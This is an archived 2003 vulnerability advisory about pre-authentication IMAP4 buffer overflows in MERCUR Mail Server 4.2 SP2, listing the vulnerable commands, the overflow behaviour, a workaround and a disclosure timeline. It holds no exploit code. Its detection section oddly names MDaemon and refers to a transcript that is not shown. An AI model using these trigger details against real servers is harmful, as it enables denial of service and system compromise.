[STATUS, EXAMINE, DELETE, SUBSCRIBE, UNSUBSCRIBE, RENAME, LIST, LSUB, LOGIN,
CREATE, SELECT]
Multiple Buffer Overflow Vulnerabilities
Found in MERCUR Mail server v.4.2 (SP2)
http://www.atriumsoftwareusa.com/
Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------
-----[SUMMARY
Mercur Mail Server is a Windows NT4/2000/XP mail server application,
Supporting all the RFC industry standards set for POP3, IMAP4 and SMTP.
A versatile application that offers stability, security and scalability
designed to meet any size organization from the small business to an
enterprise business with thousands of employees or customers.
Mercur Mail Server supports an integrated anti-virus engine by Norman,
Black List or Open Relay connectivity, ODBC connectivity, remote Windows
GUI and Web administration administration access. Mercur Mail Server
is the ideal solution for any business.
The problem is multiple Buffer Overflows in the IMAP4 protocol, within the
MERCUR IMAP4-Server (v4.02.09), causing the service to shutdown.
-----[AFFECTED SYSTEMS
Vulnerable systems:
* MERCUR Mailserver 4.2 (SP2)- Fileversion : 4.2.14.0
Immune systems:
* MERCUR Mailserver 4.2 (SP2)- Fileversion : 4.2.15.0 or higher
-----[SEVERITY
High - An attacker is able to cause a DoS attack on the IMAP protocol
And the exception handler on the stack is overwritten allowing
A system compromise with code execution running as SYSTEM.
The reason that this is a HIGH is the there is no need to
login on the system to conduct this type of attack.
-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The Vulnerability is a Buffer Overflow in the MERCUR IMAP4-Server (v4.02.09)
When a malicious attacker sends a large amount into the EXAMINE, DELETE,
SUBSCRIBE,
RENAME, UNSUBSCRIBE, LIST, LSUB, STATUS, LOGIN, CREATE, SELECT the buffer
will overflow.
Sending to many bytes into the buffer will cause the server
To reject the request and nothing will happen, this is over 8000 chars.
---------------------------- [Exploit Code] ----------------------------
Is made but is being made public later, for auditing use only
IMAPAuditor at product being developed by www.0x36.org
---------------------------- [Exploit Code] ----------------------------
When this attack is preformed the IMAP service is terminating, but the rest
of
the services keep running.
The service has to be started manually, before working properly.
-----[DETECTION
IMAP4rev1 MDaemon 6.7.8 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
Implementation is vulnerable, experiment by following the above transcript.
-----[WORK AROUNDS
Update to version MERCUR Mailserver 4.2 (SP2)- Fileversion : 4.2.15.0 or
higher
-----[VENDOR RESPONSE
Dear Dennis,
Our programmers informed us that they have fixed the problem
and now they are testing it. I will inform you when a fix is
available, it should be soon.
Thank you for pointing out this problem to us.
Sincerely,
Alex Ribeiro
-----[DISCLOSURE TIMELINE
10/05/2003 Found the Vulnerability, and made an analysis.
13/05/2003 Reported to Vendor.
14/05/2003 Recived information from Vendor
06/06/2003 Public Disclosure.
-----[ADDITIONAL INFORMATION
The vulnerability was discovered and reported by <derat_private> Dennis
Rand
-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect,
incidental, consequential, loss of business profits or special damages.
This archive was generated by hypermail 2b30 : Fri Jun 06 2003 - 11:15:18 PDT